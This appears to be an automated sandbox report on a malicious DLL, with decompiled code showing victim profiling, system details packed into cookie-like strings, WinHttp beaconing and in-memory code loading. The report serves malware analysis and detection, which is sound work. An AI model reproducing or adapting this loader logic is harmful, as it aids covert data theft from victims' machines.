					 *(_t29 + 0xa8) =  *(_t17 + 0x4d) & 0x000000ff;
					 *(_t29 + 0xac) =  *(_t17 + 0x4e) & 0x00003fff;
					 *(_t29 + 0xb0) = ( *(_t17 + 0x4c) ^ 0xbfffffff) >> 0x1e;
				}
				_t18 =  &_v8;
				__imp__ImageDirectoryEntryToData( *((intOrPtr*)(_t29 + 8)), 1, 0xa, _t18);
				if(_t18 != 0) {
					_t18 =  *(_t18 + 0x34) & 0x0000ffff;
					if(_t18 != 0) {
						 *(_t29 + 0xae) = _t18;
					}
				}
				return _t18;
			}







                                              0x0076146d
                                              0x00761477
                                              0x0076147a
                                              0x00761485
                                              0x007623b7
                                              0x007623c1
                                              0x007623d3
                                              0x007623e5
                                              0x007623e5
                                              0x00761491
                                              0x0076149c
                                              0x007614a4
                                              0x007614a6
                                              0x007614ad
                                              0x007623f0
                                              0x007623f0
                                              0x007614ad
                                              0x007614b5

                                              APIs
                                              • RtlImageNtHeader.NTDLL(?), ref: 0076147A
                                              • ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,00000001,?,?,007612FF,00000001,?,?,?,00000001,?,?,00000000,?), ref: 0076149C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Image$DataDirectoryEntryHeader
                                              • String ID: )G`v
                                              • API String ID: 3478907836-1429216067
                                              • Opcode ID: ee4aeb5c61fe1cf313c1e3b53e7667abacc247d1472f07ff0a8fbc81d1b24393
                                              • Instruction ID: 97d60d10e6d64c9b022b2a45c84c22176cb1d29796a400d5d8e5afc65d603815
                                              • Opcode Fuzzy Hash: ee4aeb5c61fe1cf313c1e3b53e7667abacc247d1472f07ff0a8fbc81d1b24393
                                              • Instruction Fuzzy Hash: 1B01D270124794EFC7208F22D404BE37BB4EF05710F494499EA978B2A1E778D940CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:4.5%
                                              Dynamic/Decrypted Code Coverage:82.2%
                                              Signature Coverage:39.1%
                                              Total number of Nodes:230
                                              Total number of Limit Nodes:19
                                              execution_graph 6630 180002aa4 6633 180002174 6630->6633 6634 180002190 SleepEx 6633->6634 6634->6634 6635 1800021b4 wsprintfW 6634->6635 6636 1800021d1 6635->6636 6650 180002860 GetProcessHeap RtlAllocateHeap 6636->6650 6639 1800021e5 6665 180001d80 wsprintfW 6639->6665 6640 18000224e 6645 180002232 6686 180001b5c GetProcessHeap HeapAlloc 6645->6686 6646 18000221e GetProcessHeap HeapFree 6646->6645 6651 1800028a1 wsprintfW wsprintfW 6650->6651 6652 1800021e0 6650->6652 6745 180001484 GetTickCount64 6651->6745 6652->6639 6652->6640 6654 1800028e7 wsprintfW 6696 18000108c 6654->6696 6658 18000292f 6717 1800027b4 6658->6717 6660 18000293b 6720 180002018 GetComputerNameExW 6660->6720 6664 180002956 6664->6652 6670 180001db5 6665->6670 6667 180001e2e 6668 180001e33 GetProcessHeap HeapFree 6667->6668 6669 180001e27 6667->6669 6668->6669 6669->6640 6674 180001198 6669->6674 6670->6667 6670->6669 6671 180001e1a Sleep 6670->6671 6672 180001e06 GetProcessHeap HeapFree 6670->6672 6777 180001b08 6670->6777 6780 180001760 6670->6780 6671->6670 6672->6671 6675 1800011a9 6674->6675 6685 180001211 6674->6685 6675->6685 6809 180001688 SHGetFolderPathA 6675->6809 6678 1800011cb GetLastError 6678->6685 6679 1800011dc 6814 180001000 GetTempPathA 6679->6814 6682 1800011ed GetLastError 6682->6685 6683 1800011ff 6821 180002268 6683->6821 6685->6645 6685->6646 6687 180001bc2 6686->6687 6688 180001b92 6686->6688 6687->6640 6691 180002480 wsprintfW 6687->6691 6689 1800014b4 6 API calls 6688->6689 6690 180001ba4 wsprintfW 6689->6690 6690->6687 6692 180001b08 19 API calls 6691->6692 6693 1800024ca 6692->6693 6694 1800024f0 6693->6694 6695 1800024dc GetProcessHeap HeapFree 6693->6695 6694->6640 6695->6694 6707 1800010a3 6696->6707 6697 1800010a8 LoadLibraryA GetProcAddress 6698 1800010cd NtQuerySystemInformation 6697->6698 6700 180001135 6697->6700 6699 180001131 6698->6699 6698->6707 6699->6700 6702 18000116b 6699->6702 6706 18000112f wsprintfW 6700->6706 6708 180001153 GetProcessHeap HeapFree 6700->6708 6701 1800010f5 GetProcessHeap 6703 18000111a RtlAllocateHeap 6701->6703 6704 18000110c HeapReAlloc 6701->6704 6705 180001170 GetProcessHeap HeapFree 6702->6705 6702->6706 6703->6707 6704->6707 6705->6706 6709 180001904 6706->6709 6707->6697 6707->6698 6707->6701 6707->6706 6708->6706 6710 18000192d LoadLibraryA GetProcAddress 6709->6710 6711 18000199a wsprintfW wsprintfW 6710->6711 6713 180001953 6710->6713 6712 1800019da wsprintfW 6711->6712 6746 180001bd4 6712->6746 6713->6711 6715 18000195e wsprintfW wsprintfW 6713->6715 6715->6712 6750 180002c88 6717->6750 6721 180002062 6720->6721 6757 1800014b4 6721->6757 6724 1800020a1 6725 1800014b4 6 API calls 6724->6725 6726 1800020be 6725->6726 6727 1800014b4 6 API calls 6726->6727 6728 1800020d4 6727->6728 6763 180001c28 GetComputerNameExW 6728->6763 6731 180002144 wsprintfW 6734 180002142 6731->6734 6732 1800020ff wsprintfW 6733 18000213d 6732->6733 6733->6734 6735 180002117 wsprintfW 6733->6735 6736 18000133c LoadLibraryA GetProcAddress 6734->6736 6735->6733 6737 180001388 GetAdaptersInfo 6736->6737 6744 1800013df 6736->6744 6738 180001396 6737->6738 6737->6744 6739 18000139f GetProcessHeap HeapAlloc 6738->6739 6738->6744 6740 1800013bd GetAdaptersInfo 6739->6740 6739->6744 6741 1800013cb GetProcessHeap HeapFree 6740->6741 6742 180001414 6740->6742 6741->6744 6743 18000145f GetProcessHeap HeapFree 6742->6743 6743->6744 6744->6664 6745->6654 6747 180001bea LoadLibraryA GetProcAddress 6746->6747 6748 1800019ff wsprintfW 6747->6748 6749 180001c0e GetNativeSystemInfo 6747->6749 6748->6658 6749->6748 6751 180002cb5 6750->6751 6754 180002ac0 6751->6754 6755 180002adb SwitchToThread SwitchToThread 6754->6755 6755->6755 6756 1800027cb wsprintfW wsprintfW wsprintfW wsprintfW 6755->6756 6756->6660 6758 1800014d7 6757->6758 6773 180001604 lstrlenW 6758->6773 6761 18000154c GetProcessHeap HeapFree 6762 180001560 GetUserNameW 6761->6762 6762->6724 6764 180001d68 6763->6764 6765 180001c60 LookupAccountNameW 6763->6765 6764->6731 6764->6732 6765->6764 6766 180001c96 GetLastError 6765->6766 6766->6764 6767 180001ca5 6766->6767 6767->6764 6768 180001cb0 GetProcessHeap HeapAlloc 6767->6768 6768->6764 6769 180001cd6 LookupAccountNameW 6768->6769 6770 180001d54 GetProcessHeap HeapFree 6769->6770 6772 180001d08 6769->6772 6770->6764 6771 180001d3c GetProcessHeap HeapFree 6771->6764 6772->6771 6772->6772 6774 1800014f9 6773->6774 6775 180001627 GetProcessHeap HeapAlloc 6773->6775 6774->6761 6774->6762 6775->6774 6776 180001647 WideCharToMultiByte 6775->6776 6776->6774 6786 1800024fc WinHttpOpen 6777->6786 6781 1800018de 6780->6781 6782 18000178e 6780->6782 6781->6670 6782->6781 6783 180001801 GetProcessHeap HeapAlloc 6782->6783 6784 180001827 6782->6784 6783->6781 6783->6784 6784->6781 6785 1800018ca GetProcessHeap HeapFree 6784->6785 6785->6781 6787 180001b54 6786->6787 6789 180002556 6786->6789 6787->6670 6788 180002574 WinHttpConnect 6791 180002594 WinHttpOpenRequest 6788->6791 6792 180002790 WinHttpCloseHandle 6788->6792 6789->6788 6790 180002568 WinHttpSetStatusCallback 6789->6790 6790->6788 6793 180002787 WinHttpCloseHandle 6791->6793 6794 1800025e8 6791->6794 6792->6787 6793->6792 6795 18000260b WinHttpSendRequest 6794->6795 6796 1800025ed WinHttpSetOption 6794->6796 6797 18000277e WinHttpCloseHandle 6795->6797 6798 18000263f WinHttpReceiveResponse 6795->6798 6796->6795 6797->6793 6798->6797 6799 180002652 WinHttpQueryHeaders WinHttpQueryHeaders 6798->6799 6800 1800026b6 WinHttpQueryDataAvailable 6799->6800 6801 180002734 6800->6801 6802 1800026ca 6800->6802 6803 180002760 6801->6803 6805 18000274c GetProcessHeap HeapFree 6801->6805 6802->6800 6802->6801 6804 1800026d7 GetProcessHeap 6802->6804 6808 18000270f WinHttpReadData 6802->6808 6803->6797 6806 1800026fc HeapAlloc 6804->6806 6807 1800026ee HeapReAlloc 6804->6807 6805->6803 6806->6802 6807->6802 6808->6801 6808->6802 6810 1800016e1 6 API calls 6809->6810 6811 1800016da 6809->6811 6831 180002a18 CreateFileA 6810->6831 6811->6810 6815 180001042 lstrcatA 6814->6815 6816 180001038 6814->6816 6817 180001061 6815->6817 6816->6815 6818 180002a18 CreateFileA 6817->6818 6819 1800011e9 6818->6819 6820 180002a5b WriteFile CloseHandle 6818->6820 6819->6682 6819->6683 6820->6819 6834 180001f2c lstrcpyA SHGetFolderPathA 6821->6834 6824 180002311 GetProcessHeap HeapAlloc 6825 180002338 6824->6825 6830 1800023f3 6824->6830 6826 180002415 6825->6826 6827 1800023d5 6825->6827 6840 180002b5c VirtualAlloc 6826->6840 6829 1800023df GetProcessHeap HeapFree 6827->6829 6827->6830 6829->6830 6830->6685 6832 1800011c7 6831->6832 6833 180002a5b WriteFile CloseHandle 6831->6833 6832->6678 6832->6679 6833->6832 6835 180001f95 lstrcatA 6834->6835 6836 180001f86 lstrcpyA 6834->6836 6837 180001fa2 lstrcatA lstrcpyA 6835->6837 6836->6837 6838 180001ff6 6837->6838 6839 180001fe0 lstrcpyA 6837->6839 6838->6824 6838->6825 6838->6830 6839->6838 6841 180002b95 GetLastError 6840->6841 6842 180002baa 6840->6842 6843 180002c00 6841->6843 6842->6843 6851 180001e64 6842->6851 6843->6830 6846 180002c16 GetLastError 6846->6843 6847 180002c28 6848 180002c56 6847->6848 6849 180002c2d VirtualProtect 6847->6849 6848->6843 6850 180002c63 GetLastError 6848->6850 6849->6848 6849->6849 6850->6843 6852 180001f08 6851->6852 6855 180001e8a 6851->6855 6852->6846 6852->6847 6853 180001e97 LoadLibraryA 6853->6852 6853->6855 6854 180001ed0 GetProcAddress 6854->6852 6854->6855 6855->6852 6855->6853 6855->6854 6856 180001b08 6857 1800024fc 19 API calls 6856->6857 6858 180001b54 6857->6858 6859 180001318 6860 180001329 6859->6860 6861 180001332 ExitProcess 6860->6861 6862 18000131e SleepEx 6860->6862 6862->6860 6863 7fef7536271 6864 7fef753623f 6863->6864 6864->6863 6865 7fef753620e NtCreateSection 6864->6865 6869 7fef753621e 6864->6869 6868 7fef7536594 6865->6868 6866 7fef75366d4 6867 7fef75366a7 NtMapViewOfSection 6867->6869 6868->6868 6869->6866 6869->6867 6870 7fef7532cca 6871 7fef7532f92 CryptCreateHash 6870->6871 6872 7fef7532f68 6871->6872 6873 7fef75336fa 6876 7fef7533708 6873->6876 6874 7fef75336ec 6875 7fef7533834 RtlAllocateHeap 6875->6874 6875->6876 6876->6873 6876->6874 6876->6875 6877 2a0000 6878 2a0036 6877->6878 6879 2a0127 GetNativeSystemInfo 6878->6879 6882 2a04e1 6878->6882 6880 2a015f VirtualAlloc 6879->6880 6879->6882 6884 2a017d 6880->6884 6881 2a02f1 LoadLibraryA 6881->6884 6883 2a0341 6883->6882 6885 2a04bd VirtualProtect 6883->6885 6884->6881 6884->6883 6885->6883 6886 18000244c 6887 180002474 6886->6887 6888 180002455 CreateThread 6886->6888 6888->6887 6901 7fef7535fe6 6902 7fef7535fdd 6901->6902 6903 7fef7535fed 6901->6903 6904 7fef753620e NtCreateSection 6903->6904 6905 7fef753621e 6903->6905 6906 7fef7536594 6904->6906 6905->6902 6907 7fef75366a7 NtMapViewOfSection 6905->6907 6906->6906 6907->6905 6889 7fef7532cf7 6890 7fef7532d01 CryptAcquireContextW 6889->6890 6891 7fef7532cda CryptCreateHash 6889->6891 6893 7fef7532faa 6890->6893 6891->6893 6894 7fef7535ff9 6895 7fef7536173 6894->6895 6896 7fef753620e NtCreateSection 6895->6896 6899 7fef753621e 6895->6899 6900 7fef753616d 6895->6900 6896->6900 6897 7fef75366d4 6898 7fef75366a7 NtMapViewOfSection 6898->6899 6899->6897 6899->6898

                                              Executed Functions

                                              Function 00000001800024FC Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 198memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Http$Heap$CloseHandleQuery$AllocDataHeadersOpenProcessRequest$AvailableCallbackConnectFreeOptionReadReceiveResponseSendStatus
                                              • String ID: GET$POST
                                              • API String ID: 1614834629-3192705859
                                              • Opcode ID: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
                                              • Instruction ID: f84e999ab61f2fbba52d9160ce5dc28e4838b3332290d6c6070ea75f8e9928f1
                                              • Opcode Fuzzy Hash: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
                                              • Instruction Fuzzy Hash: A881A972304B8987EBA6CF66E800BD937A5FB4CBD4F448129AE0957B54DF38C698C704
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000000018000133C Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 87memorylibraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 22%
                                              			E0000000118000133C(long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				void* _t16;
				void* _t19;
				long long* _t34;
				void* _t48;
				long long* _t54;
				long long* _t56;
				void* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				CHAR* _t67;

				_t34 = _t56;
				 *((long long*)(_t34 + 8)) = __rbx;
				 *((long long*)(_t34 + 0x18)) = __rbp;
				 *((long long*)(_t34 + 0x20)) = __rsi;
				 *(_t34 + 0x10) =  *(_t34 + 0x10) & 0;
				LoadLibraryA(_t67); // executed
				GetProcAddress(_t64);
				_t54 = _t34;
				if (_t34 == 0) goto 0x800013df;
				_t16 =  *_t54(); // executed
				if (_t16 != 0x6f) goto 0x800013df;
				if (__rbx == 0) goto 0x800013df;
				GetProcessHeap();
				HeapAlloc(??, ??, ??);
				if (_t34 == 0) goto 0x800013df;
				_t19 =  *_t54(); // executed
				if (_t19 == 0) goto 0x80001414;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				r9d = 1;
				return E00000001180001578(0, _t34, __rbx, __rcx, L"; _gid=", _t34, 0x800070bc, _t62, _t63, _t48);
			}














                                              0x18000133c
                                              0x18000133f
                                              0x180001343
                                              0x180001347
                                              0x180001367
                                              0x18000136a
                                              0x18000137a
                                              0x180001380
                                              0x180001386
                                              0x18000138f
                                              0x180001394
                                              0x18000139d
                                              0x18000139f
                                              0x1800013af
                                              0x1800013bb
                                              0x1800013c5
                                              0x1800013c9
                                              0x1800013cb
                                              0x1800013d9
                                              0x1800013df
                                              0x180001413

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AdaptersFreeInfo$AddressAllocLibraryLoadProc
                                              • String ID: ; _gid=$GetAdaptersInfo$IPHLPAPI.DLL
                                              • API String ID: 3866128989-336904856
                                              • Opcode ID: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
                                              • Instruction ID: b75e3b5367209cd78c64b13d950b78932923334006a58f125620b5977970df53
                                              • Opcode Fuzzy Hash: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
                                              • Instruction Fuzzy Hash: 55317872600B88DAEB96DB22F4443D973A1AB4DBC5F48C025EA0D0A765DF38C64EC300
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000000018000108C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 77memorylibrarynativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$Free$AddressAllocAllocateInformationLibraryLoadProcQuerySystem
                                              • String ID: NTDLL.DLL$ZwQuerySystemInformation
                                              • API String ID: 2948972359-2445179936
                                              • Opcode ID: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
                                              • Instruction ID: c553ab603bbb7ea155e402bcf953277eb51bc389a09fd2bd74e1016edb044849
                                              • Opcode Fuzzy Hash: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
                                              • Instruction Fuzzy Hash: 5B313E72715A89C6FADADB56A8043D972A1AB4CBC2F48C034FB0957754EF3CCA4D8705
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180002018 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 81COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 44%
                                              			E00000001180002018(void* __eax, long long __rbx, void* __rcx, signed int __rdx, long long __rdi, long long __rsi) {
				void* __rbp;
				int _t34;
				void* _t37;
				signed long long _t49;
				signed long long _t52;
				void* _t83;
				WCHAR* _t85;
				void* _t86;
				signed long long _t88;
				void* _t89;
				WCHAR* _t98;
				WCHAR* _t100;

				_t49 = _t88;
				 *((long long*)(_t49 + 0x10)) = __rbx;
				 *((long long*)(_t49 + 0x18)) = __rsi;
				 *((long long*)(_t49 + 0x20)) = __rdi;
				_t86 = _t49 - 0x168;
				_t89 = _t88 - 0x250;
				 *((intOrPtr*)(_t86 + 0x170)) = 0x100;
				_t83 = __rcx;
				__imp__GetComputerNameExW(); // executed
				if (__eax != 0) goto 0x8000206a;
				 *((intOrPtr*)(_t89 + 0x40)) = 0x78;
				E000000011800014B4(_t49, __rbx, __rcx, L"; _u=", __rcx, _t86, _t89 + 0x40);
				 *((intOrPtr*)(_t86 + 0x170)) = 0x100;
				_t52 = _t49; // executed
				_t34 = GetUserNameW(_t100); // executed
				if (_t34 != 0) goto 0x800020a9;
				 *((intOrPtr*)(_t89 + 0x40)) = 0x78;
				E000000011800014B4(_t49, _t52, _t83 + _t52 * 2, ":", _t83, _t86, _t89 + 0x40);
				_t53 = _t52 + _t49;
				_t37 = E00000001180001C28(E000000011800014B4(_t49, _t52 + _t49, _t83 + (_t52 + _t49) * 2, ":", _t83, _t86, __rdx), 5, _t53 + _t49, _t89 + 0x20);
				r14d = _t37;
				if (_t37 == 0) goto 0x80002144;
				r9d =  *((intOrPtr*)(_t89 + 0x20));
				wsprintfW(_t98);
				goto 0x8000213d;
				r9d =  *((intOrPtr*)(_t89 + 0x20 + __rdx * 4));
				wsprintfW(_t85);
				if (__rdx + 1 - _t98 < 0) goto 0x80002117;
				goto 0x80002153;
				r9d = 0;
				return wsprintfW(??, ??);
			}















                                              0x180002018
                                              0x18000201b
                                              0x18000201f
                                              0x180002023
                                              0x18000202c
                                              0x180002033
                                              0x18000203d
                                              0x180002047
                                              0x180002058
                                              0x180002060
                                              0x180002062
                                              0x180002079
                                              0x180002085
                                              0x180002094
                                              0x180002097
                                              0x18000209f
                                              0x1800020a1
                                              0x1800020b9
                                              0x1800020be
                                              0x1800020e1
                                              0x1800020e6
                                              0x1800020fd
                                              0x1800020ff
                                              0x180002104
                                              0x180002115
                                              0x180002117
                                              0x18000212e
                                              0x180002140
                                              0x180002142
                                              0x180002144
                                              0x180002172

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wsprintf$Name$ComputerUser
                                              • String ID: %s%u$; __io=$; _u=$x
                                              • API String ID: 4095488650-3513353778
                                              • Opcode ID: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
                                              • Instruction ID: 7d741998cccdb29629df25af753f6537b3149e73fb9b8afa304b05458abafeeb
                                              • Opcode Fuzzy Hash: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
                                              • Instruction Fuzzy Hash: A73149B2704A8992EBA2CB11E8443D97370F75C7C5F948126EA4D5B665EF3CC60EC740
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001C28 Relevance: 15.1, APIs: 10, Instructions: 93memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$NameProcess$AccountFreeLookup$AllocComputerErrorLast
                                              • String ID:
                                              • API String ID: 2409119217-0
                                              • Opcode ID: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
                                              • Instruction ID: bccd91b441821ca56803e91b7d04f4d1ec65d623121010ca1dafda4b918fcf64
                                              • Opcode Fuzzy Hash: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
                                              • Instruction Fuzzy Hash: 06315E72701B498AEB62DF74E4443D933E5EB4DBC9F548026EA4D56A58EF38C60CC340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180002174 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 56%
                                              			E00000001180002174(void* __eax, void* __eflags, signed int __rax, signed int __rbx, signed int __rcx, signed int __rdx, long long __rdi, void* __rsi, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				signed long long _t51;
				void* _t72;
				long _t75;
				void* _t76;
				void* _t78;
				void* _t85;

				_t74 = __rsi;
				_t52 = __rbx;
				 *((long long*)(_t78 + 0x18)) = __rbx;
				 *((long long*)(_t78 + 0x20)) = __rdi;
				_t76 = _t78 - 0x57;
				_t4 = _t52 + 4; // 0x4
				asm("rdtsc");
				_t51 = __rax | __rdx << 0x00000020;
				_t54 = __rbx << 0x00000010 | __rcx;
				SleepEx(_t75); // executed
				_t72 = __rdi - 1;
				if (__eflags != 0) goto 0x80002190;
				wsprintfW(??, ??);
				E00000001180002428(_t76 - 0x29, __rbx << 0x00000010 | __rcx);
				_t9 = _t72 + 1; // 0x4
				E00000001180002860( *((intOrPtr*)(_t76 + 0x17)), _t9, _t4, _t51, __rbx << 0x00000010 | __rcx, __rsi, _t76, _t76 - 0x69, _t85);
				if (_t51 == 0) goto 0x8000224e;
				if (E00000001180001D80(_t9, _t51, _t51, _t54, _t76 + 0x1b, _t51, _t74, _t76, _t76 + 0x67, _t76 + 0x6f, __r11, __r14) == 0) goto 0x8000224e;
				if ( *((intOrPtr*)(_t76 + 0x6f)) - 0x400 < 0) goto 0x8000224e;
				_t27 = E00000001180001198(_t9,  *((intOrPtr*)(_t76 + 0x67)),  *((intOrPtr*)(_t76 + 0x6f)), _t76 + 0x67);
				if ( *((intOrPtr*)(_t76 + 0x67)) == 0) goto 0x80002232;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				E00000001180001B5C(_t27, _t51,  *((intOrPtr*)(_t76 + 0x67)), _t76 - 0x69, _t74);
				if (_t51 == 0) goto 0x8000224e;
				E00000001180002480(_t51, _t76 + 0x1b, _t51);
				return 0;
			}











                                              0x180002174
                                              0x180002174
                                              0x180002174
                                              0x180002179
                                              0x18000217f
                                              0x18000218d
                                              0x180002194
                                              0x18000219a
                                              0x1800021a0
                                              0x1800021a8
                                              0x1800021ae
                                              0x1800021b2
                                              0x1800021c2
                                              0x1800021cc
                                              0x1800021d8
                                              0x1800021db
                                              0x1800021e3
                                              0x1800021fb
                                              0x180002208
                                              0x18000220e
                                              0x18000221c
                                              0x18000221e
                                              0x18000222c
                                              0x180002238
                                              0x180002240
                                              0x180002249
                                              0x180002264

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcessSleepwsprintf
                                              • String ID: %016IX
                                              • API String ID: 2187706517-1811457740
                                              • Opcode ID: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
                                              • Instruction ID: 661cb7bdf0d2a5cc3032a3c802704869fbd6bc5f67ca47283b56c7d180ea033d
                                              • Opcode Fuzzy Hash: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
                                              • Instruction Fuzzy Hash: E9214F72300A499AEB92DFA1D9543DD33A6E7487C4F888425BE0D6B699EE38D64CC350
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000007FEF7535FF9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
